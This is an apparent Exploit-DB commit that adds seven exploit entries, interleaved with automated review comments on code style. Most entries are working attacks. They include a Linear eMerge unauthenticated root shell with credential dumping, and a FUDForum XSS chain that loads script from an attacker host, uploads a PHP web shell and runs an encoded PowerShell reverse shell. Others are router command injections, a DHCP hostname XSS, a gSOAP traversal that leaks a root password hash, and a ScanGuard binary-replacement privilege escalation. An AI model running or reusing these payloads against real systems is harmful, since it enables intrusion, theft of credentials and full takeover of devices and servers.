DB: 2019-11-14
7 changes to exploits/shellcodes
ScanGuard Antivirus 2020 - Insecure Folder Permissions
Linear eMerge E3 1.00-06 - Remote Code Execution
FUDForum 3.0.9 - Remote Code Execution
Technicolor TD5130.2 - Remote Command Execution
Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
gSOAP 2.8 - Directory Traversal
Fastweb Fastgate 0.00.81 - Remote Code Execution
This commit is contained in:
parent
c8181201fd
commit
e84e1285da
8 changed files with 610 additions and 0 deletions
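--- a/exploits/hardware/webapps/47649.py
+++ b/exploits/hardware/webapps/47649.py
@@ -0,0 +1,116 @@
+# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-13
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7256
+
+#!/usr/bin/env python
+#
+# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
+# Affected version: <=1.00-06
+# via card_scan_decoder.php
+# CVE: CVE-2019-7256
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+#
+# By Gjoko 'LiquidWorm' Krstic
+#
+#########################################################################
+# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
+# Do you want me to try and get the web front-end credentials? (y/n) y
+# ID='admin',Password='MakeLoveNotWar!'
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ id
+# uid=1003(lighttpd) gid=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
+# Software Version: 1.00.03
+# Image: nxgcpub-image
+# Built by: jenkins
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
+# Password:
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ exit
+#
+# [+] Erasing read stage file and exiting...
+# [+] Done. Ba-bye!
+#
+#########################################################################
+
+import requests
+import time####
+import sys#####
+import os######
+import re######
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+print '''
+.....
+.e$$$$$$$$$$$$$$e.
+z$$ ^$$$$$$$$$$$$$$$$$.
+.$$$* J$$$$$$$$$$$$$$$$$$$e
+.$" .$$$$$$$$$$$$$$$$$$$$$$*-
+.$ $$$$$$$$$$$$$$$$***$$ .ee"
+z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
+" -\e$$ 4$$$$. .ze$$$""""
+4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
+$$$$$$$$ .$$$$$$$$$$$**$$$$*"
+z$$" $$ $$$$P*"" J$*$$c
+$$" $$F .$$$ $$ ^$$
+$$ *$$c.z$$$ $$ $$
+$P $$$$$$$ 4$F 4$
+dP *$$$" $$ '$r
+.$ J$" $"
+$ $P 4$
+F $$ 4$
+4$% 4$
+$$ 4$
+d$" $$
+$P $$
+$$ $$
+4$% $$
+$$ $$
+d$ $$
+$F "3
+r=4e=" ... ..rf . ""%
+$**$*"^""=..^4*=4=^"" ^"""
+'''
+print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
+print '\x20\x20[-] by lqwrm (c) 2019'
+print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
+sys.exit()
+
+ipaddr = sys.argv[1]
+
+creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
+if creds.strip() == 'y':
+frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
+requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
+showme = requests.get('http://'+ipaddr+'/test.txt')
+print showme.text
+
+while True:
+try:
+cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
+execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
+#time.sleep(1);
+readreq = requests.get('http://'+ipaddr+'/test.txt')
+print readreq.text
+if cmd.strip() == 'exit':
+print "[+] Erasing read stage file and exiting..."
+requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
+print "[+] Done. Ba-bye!\n"
+break
+else: continue
+except Exception:
+break
+
+sys.exit()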
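Review bot: The header states two different affected-version ranges — `# Affected version: <=2.3.0a` in the first header block and `# Affected version: <=1.00-06` in the script's own banner, while the title says 1.00-06 — so a reader triaging the entry cannot tell which product line the first number refers to; the first line should match the second or be qualified. The `#!/usr/bin/env python` line sits below nine header comments, so it is not an effective shebang and does not pin the interpreter (the same applies to `#!/usr/bin/env python3` in 47652.py); since the `print` statements and `raw_input` make this Python 2 only, a `# Tested with: Python 2.x` header line would document that. In the command loop, `except Exception: break` ends the session on any error without saying why; `except requests.RequestException as e: print '[-] request failed: %s' % e; break` keeps the behaviour and reports the cause, and `time`, `re` and the `execute` result are assigned or imported but never used.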
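--- a/exploits/hardware/webapps/47651.txt
+++ b/exploits/hardware/webapps/47651.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
+# Date: 2019-11-12
+# Exploit Author: João Teles
+# Vendor Homepage: https://www.technicolor.com/
+# Version: TD5130v2
+# Firmware Version: OI_Fw_V20
+# CVE : CVE-2019-18396
+
+---------------------------
+
+POST /mnt_ping.cgi HTTP/1.1
+Host: HOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http:/HOST/mnt_ping.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+Cookie: session=COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+isSubmit=1&addrType=3&pingAddr=;ls&send=Send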
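Review bot: The request carries `Cookie: session=COOKIE`, so the issue is reachable only with an authenticated web-UI session, but the header block does not state that precondition, which is the first thing a reader needs for rating exposure; a line such as `# Authentication: required (valid web-UI session cookie)` after the CVE line would make it explicit. The `Referer: http:/HOST/mnt_ping.cgi` line is missing a slash after the scheme, which looks like a transcription error in the captured request rather than something the author intended.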
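--- a/exploits/hardware/webapps/47652.py
+++ b/exploits/hardware/webapps/47652.py
@@ -0,0 +1,89 @@
+# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: Luis Stefan
+# Vendor Homepage: https://www.technicolor.com/
+# Software Link: N/A
+# Version: TC7300.B0 - STFA.51.20
+# Tested on: macOS Mojave and Catalina
+# CVE :
+
+#!/usr/bin/env python3
+__author__ = "Luis Stefan"
+__license__ = "MIT"
+__version__ = "1.0"
+__email__ = "luis.ss@protonmail.com"
+__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""
+
+from enum import IntEnum
+from scapy.all import *
+import codecs, threading, time
+
+# Define your network interface
+interface = 'en0'
+# Insert your interface card mac address
+mac = 'xx:xx:xx:xx:xx:xx'
+broadcast = 'ff:ff:ff:ff:ff:ff'
+mac_hxd = codecs.decode(mac.replace(':', ''),'hex')
+
+class Bootp(IntEnum):
+Discover = 1
+Offer = 2
+Request = 3
+Decline = 4
+Ack = 5
+Nak = 6
+Release = 7
+
+def dhcp_discover():
+disc_pkt = Ether(src=mac, dst=broadcast) / \
+IP(src='0.0.0.0', dst='255.255.255.255') / \
+UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+DHCP(options=[('message-type', 'discover'), 'end'])
+sendp(disc_pkt, iface=interface)
+
+def dhcp_request(pkt):
+yraddr = pkt['BOOTP'].yraddr
+# gwaddr == Gateway Ip Address
+gwaddr = '192.168.0.1'
+param_req_list = []
+hostname = "<script>alert('XSS triggered')</script>"
+req_pkt = Ether(src=mac, dst=broadcast) / \
+IP(src='0.0.0.0', dst='255.255.255.255') / \
+UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
+('requested_addr', yraddr), ('hostname', hostname), 'end'])
+sendp(req_pkt, iface=interface)
+
+def dhcp(pkt):
+print(pkt.display())
+print("#############################################################")
+if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
+dhcp_request(pkt)
+elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
+print("Server Acknowledged")
+sys.exit(0)
+elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
+print("Server Declined")
+sys.exit(0)
+elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
+print("Server Nak")
+sys.exit(0)
+
+
+def ver_dhcp():
+print("Verifying DHCP port traffic..")
+sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
+sys.exit(0)
+
+
+def main():
+t1 = threading.Thread(target=ver_dhcp, args=())
+t1.setDaemon = True
+t1.start()
+time.sleep(2)
+dhcp_discover()
+
+
+if __name__ == "__main__":
+main()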
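Review bot: `t1.setDaemon = True` in `main()` replaces the bound method with a boolean instead of calling it, so the sniffer thread is never marked as a daemon and the process can stay alive after `dhcp_discover()` returns until the 20-second `sniff` timeout fires; it should read `t1.daemon = True`. `sys.exit(0)` is called in `dhcp()` and `ver_dhcp()` but `sys` is never imported — it only resolves if `from scapy.all import *` happens to re-export it — and inside the sniff callback it raises `SystemExit` in the worker thread only, so `import sys` should be explicit and the callback should hand the result back to the main thread rather than try to exit the process. `param_req_list` in `dhcp_request()` is assigned and never used, and the header's `# CVE :` line is left empty although `__description__` names CVE-2019-17524, so one of the two should be brought in line with the other.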
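--- a/exploits/hardware/webapps/47654.py
+++ b/exploits/hardware/webapps/47654.py
@@ -0,0 +1,84 @@
+# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
+# Date: 2019-11-13
+# Exploit Author: Riccardo Gasparini
+# Vendor Homepage: https://www.fastweb.it/
+# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
+# Version: 0.00.81
+# Tested on: Linux
+# CVE : N/A
+
+import requests, json, time, sys
+
+current_milli_time = lambda: int(round(time.time() * 1000))
+
+password='XXXXXXXXXXXXXXX'
+
+if password == 'XXXXXXXXXXXXXXX':
+print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
+sys.exit(-1)
+
+#get XSRF-TOKEN
+headers = {
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+'Referer': 'http://192.168.1.254/tr069',
+}
+params = ()
+response = requests.get('http://192.168.1.254', headers=headers)
+
+#login request and get sessionKey
+xsrfToken=response.cookies['XSRF-TOKEN']
+cookies = {
+'XSRF-TOKEN': xsrfToken,
+}
+headers = {
+'Pragma': 'no-cache',
+'X-XSRF-TOKEN': xsrfToken,
+'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
+'Accept': 'application/json, text/plain, */*',
+'Referer': 'http://192.168.1.254/tr069',
+'Accept-Encoding': 'gzip, deflate',
+'Connection': 'keep-alive',
+'Cache-Control': 'no-cache',
+}
+params = (
+('_', str(current_milli_time())),
+('cmd', '3'),
+('nvget', 'login_confirm'),
+('password', password),
+('remember_me', '1'),
+('sessionKey', 'NULL'),
+('username', 'admin'),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+
+jsonResponse = json.loads(response.text)
+sessionKey=jsonResponse["login_confirm"]["check_session"]
+
+print("Executing command reboot\n")
+
+#some commands as example are shown below in the mount parameter
+params = (
+('_', str(current_milli_time())),
+('act','nvset'),
+('service','usb_remove'),
+#Code execution
+#('mount','&ping -c 10 192.168.1.172&'),
+#('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
+('mount','&reboot&'),
+('sessionKey', sessionKey),
+)
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(response.text)
+
+#logout
+params = (
+('_', str(current_milli_time())),
+('cmd', '5'),
+('nvget', 'login_confirm'),
+('sessionKey', sessionKey),
+)
+
+response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
+print(json.dumps(json.loads(response.text), indent=2))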
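Review bot: `response.cookies['XSRF-TOKEN']` and `jsonResponse["login_confirm"]["check_session"]` are indexed without checking the HTTP status or the presence of the keys, so an unreachable gateway or a rejected password surfaces as a `KeyError` traceback rather than a message; a `response.raise_for_status()` after each `requests.get`, and `sessionKey = jsonResponse.get("login_confirm", {}).get("check_session")` followed by an explicit exit when it is `None`, would make failures legible. The header also states `# CVE : N/A` while the title claims remote code execution, so a sentence on whether the issue was reported to the vendor would help readers assess it. As a matter of style, `http://192.168.1.254` is repeated in six string literals and should be hoisted into one constant, the empty `params = ()` before the first request is unused, and `current_milli_time = lambda: ...` is the assignment form PEP 8 asks to write as a `def`.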
103
exploits/php/webapps/47650.txt
Normal file
103
exploits/php/webapps/47650.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
|
||||
# Date: 2019-10-26
|
||||
# Exploit Author: liquidsky (JMcPeters)
|
||||
# Vulnerable Software: FUDForum 3.0.9
|
||||
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
|
||||
# Version: 3.0.9
|
||||
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
|
||||
# Tested On: Windows / mysql / apache
|
||||
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
|
||||
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
|
||||
# CVE: CVE-2019-18873
|
||||
|
||||
|
||||
// Greetz : wetw0rk, Fr13ndz, offsec =)
|
||||
//
|
||||
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
|
||||
// The areas impacted are the admin panel and the forum.
|
||||
//
|
||||
// XSS via username in Forum:
|
||||
// 1. Register an account and log in to the forum.
|
||||
// 2. Go to the user control panel. -> Account Settings -> change login
|
||||
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
|
||||
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
|
||||
//
|
||||
// XSS via user-agent in Admin Panel:
|
||||
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
|
||||
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
|
||||
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
|
||||
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
|
||||
//
|
||||
|
||||
function patience()
|
||||
{
|
||||
var u=setTimeout("grabShell()",5000);
|
||||
}
|
||||
|
||||
// This function is to call the reverse shell php script (liquidsky.php).
|
||||
// currently using a powershell payload that will need to be modified.
|
||||
function grabShell()
|
||||
{
|
||||
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42
%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%4
3%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
|
||||
xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", url, true);
|
||||
xhr.send(null);
|
||||
|
||||
}
|
||||
|
||||
function submitFormWithTokenJS(token) {
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
|
||||
|
||||
// Send the proper header information along with the request
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
|
||||
|
||||
var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
|
||||
var fileName = "liquidsky.php";
|
||||
var url = "/fudforum/adm/admbrowse.php";
|
||||
var ctype = "application/x-php";
|
||||
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
|
||||
var boundary = "-----------------------------9703186584101745941654835853";
|
||||
var fileSize = fileData.length;
|
||||
|
||||
var body = "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
|
||||
body += currentdir + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
|
||||
body += token + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
|
||||
body += "Content-Type: " + ctype + "\r\n\r\n";
|
||||
body += fileData + "\r\n\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
|
||||
body += "1" + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
|
||||
body += fileName + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
|
||||
body += "Upload File" + '\r\n';
|
||||
body += "--" + boundary + "--";
|
||||
|
||||
xhr.send(body);
|
||||
}
|
||||
|
||||
//Grab SQ token
|
||||
var req = new XMLHttpRequest();
|
||||
|
||||
req.onreadystatechange=function()
|
||||
{
|
||||
if (req.readyState == 4 && req.status == 200) {
|
||||
var htmlPage = req.responseXML; /* fetch html */
|
||||
var SQ = htmlPage.getElementsByTagName("input")[0]
|
||||
submitFormWithTokenJS(SQ.value);
|
||||
}
|
||||
}
|
||||
|
||||
req.open("GET", "/fudforum/adm/admuser.php", true);
|
||||
req.responseType = "document";
|
||||
req.send();
|
||||
|
||||
patience();
|
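Review bot: The comment above `grabShell()` says it calls "the reverse shell php script (liquidsky.php)", but the `fileData` written by `submitFormWithTokenJS()` is a plain `system($_REQUEST['cmd'])` web shell, not a reverse shell, so the comment should describe what the uploaded file actually is. `var currentdir = "C:/xampp/htdocs/fudforum"` is a deployment-specific absolute path that only the trailing `// webroot - forum directory` comment hints at; the header (`# Tested On: Windows / mysql / apache`) should state that this value is tied to the test environment. `var u` in `patience()` holds the timer id but is never read, and the `var SQ = ...` line in the `onreadystatechange` handler is missing its terminating semicolon.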
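--- a/exploits/php/webapps/47653.txt
+++ b/exploits/php/webapps/47653.txt
@@ -0,0 +1,27 @@
+# Title: gSOAP 2.8 - Directory Traversal
+# Author: Numan Türle
+# Date: 2019-11-13
+# Vendor Homepage: https://www.genivia.com/
+# Version : gSOAP 2.8
+# Software Link : https://www.genivia.com/products.html#gsoap
+
+
+POC
+---------
+
+GET /../../../../../../../../../etc/passwd HTTP/1.1
+Host: 10.200.106.101
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+HTTP/1.1 200 OK
+Server: gSOAP/2.8
+Content-Type: application/octet-stream
+Content-Length: 51
+Connection: close
+
+root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh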
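Review bot: The header has no `# CVE :` and no `# Tested on:` line, unlike the other entries in this commit (`# CVE : N/A` is the convention used by 47654.py and 47656.txt), so the entry cannot be cross-referenced; add `# CVE : N/A`, or the identifier if one was assigned. "gSOAP 2.8" names a toolkit version rather than a deployment, and the text does not say whether the traversal was observed in the stand-alone gSOAP HTTP server or in a product embedding it, which is what a reader needs to judge exposure; one sentence under `POC` stating the component tested would help. The response body reproduces a root password hash from the test host; redacting the hash value does not weaken the evidence that the file was read.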
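--- a/exploits/windows/local/47656.txt
+++ b/exploits/windows/local/47656.txt
@@ -0,0 +1,160 @@
+# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
+# Date: 2019-10-10
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.scanguard.com/
+# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
+# Version: 2020
+# Tested on: Windows
+# CVE : N/A
+# Category: exploit
+
+
+SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+https://www.scanguard.com
+
+
+[Product]
+ScanGuard Antivirus
+ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
+
+Complete Antivirus & Security Software
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+CVE-2019-18895
+
+
+[Affected Product Code Base]
+ScanGuard Antivirus - latest
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Attack Type]
+Local
+
+
+[Impact Code execution]
+true
+
+
+[Impact Escalation of Privileges]
+true
+
+
+[Impact Information Disclosure]
+true
+
+
+[Attack Vectors]
+Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.
+
+
+[Reference]
+https://support.scanguard.com/en/kb/22/upgrades-available
+
+
+[Security Issue]
+Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
+privilege escalation via a Trojan horse executable file.
+
+The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
+This can allow low integrity malware the ability to replace ScanGuard executables.
+
+
+C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
+Everyone:(OI)(CI)(ID)F
+NT SERVICE\TrustedInstaller:(ID)F
+NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
+NT AUTHORITY\SYSTEM:(ID)F
+
+
+[Exploit/POC]
+
+#include <stdio.h>
+#include <windows.h>
+#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
+#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"
+
+/* ScanGuard EoP
+PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+DWORD dwAttrib = GetFileAttributes(szPath);
+return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+
+if(!FileExists(DISABLED_TARGET)){
+rename(TARGET, DISABLED_TARGET);
+printf("[+] ScanGuard Antivirus EoP PoC\n");
+Sleep(300);
+printf("[+] Disabled ScanGuard.exe ...\n");
+Sleep(300);
+}else{
+PWNED=TRUE;
+}
+
+char fname[MAX_PATH];
+char newLoc[]=TARGET;
+
+DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+if (size){
+if(!PWNED){
+printf("[+] Copying exploit to vuln dir...\n");
+Sleep(300);
+CopyFile(fname, newLoc, FALSE);
+printf("[+] Replaced legit ScanGuard...\n");
+Sleep(300);
+printf("[+] Done!\n");
+Sleep(300);
+MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
+Sleep(2000);
+exit(0);
+}else{
+if(FileExists("ScamGuard.lnk")){
+system("DEL /f ScamGuard.lnk");
+}
+printf("[+] ScamGuard PWNED!!!");
+printf("[+] By hyp3rlinx\n");
+system("pause");
+}
+}
+}
+
+
+[Disclosure Timeline]
+Vendor Notification: September 16, 2019
+Received vendor acknowledgement: September 16, 2019
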